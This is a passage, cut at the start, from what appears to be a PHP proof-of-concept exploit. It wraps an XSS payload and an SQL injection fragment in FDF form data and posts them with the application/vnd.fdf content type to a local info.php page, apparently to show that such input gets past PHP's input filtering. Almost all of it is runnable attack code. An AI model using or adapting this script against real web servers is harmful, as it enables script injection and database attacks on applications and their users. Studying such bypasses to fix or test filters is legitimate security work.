alert(/XSS/);"; $_POST['var2'] = " ' UNION SELECT "; $url = "http://127.0.0.1/info.php"; // You do not need to change anything below this $outfdf = fdf_create(); foreach ($_POST as $key => $value) { fdf_set_value($outfdf, $key, $value, 0); } fdf_save($outfdf, "outtest.fdf"); fdf_close($outfdf); $ret = file_get_contents("outtest.fdf"); unlink("outtest.fdf"); $params = array('http' => array( 'method' => 'POST', 'content' => $ret, 'header' => 'Content-Type: application/vnd.fdf' )); $ctx = stream_context_create($params); $fp = @fopen($url, 'rb', false, $ctx); if (!$fp) { die("Cannot open $url"); } $response = @stream_get_contents($fp); echo $response; echo "\n"; ?>